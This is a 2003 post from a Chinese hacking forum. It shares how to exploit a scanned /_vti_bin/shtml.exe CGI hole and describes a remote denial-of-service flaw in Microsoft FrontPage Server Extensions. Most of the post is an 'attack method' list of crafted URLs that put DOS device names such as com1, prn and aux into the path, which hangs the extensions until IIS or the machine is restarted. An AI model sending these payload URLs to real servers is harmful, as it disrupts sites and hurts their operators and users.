Board logo

标题: [分享]/_vti_bin/shtml.exe [打印本页]

作者: damnyou    时间: 2003-1-6 04:41     标题: [分享]/_vti_bin/shtml.exe


     
     以前扫到一个/_vti_bin/shtml.exe 的cgi漏洞不知道怎么利用,我找了一下,只找到这些资料,大家分享~
     微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞,可能远程关闭一个web站点上的所有FrontPage操作。通过提交一个包含DOS设备名的链接, FrontPage Server Extensions就会挂起,不再响应后续的请求。为了恢复正常工作,必须重新启动IIS或者重新启动机器。
攻击方法:
提交这样的链接,都可能使FrontPage Server Extensions停止响应:
http://www.example.com/_vti_bin/shtml.exe/com1.htm
http://www.example.com/_vti_bin/shtml.exe/prn.htm
http://www.example.com/_vti_bin/shtml.exe/aux.htm
http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm
http://www.example.com/_vti_bin/shtml.exe/com1.asp
http://www.example.com/_vti_bin/shtml.exe/com1




欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2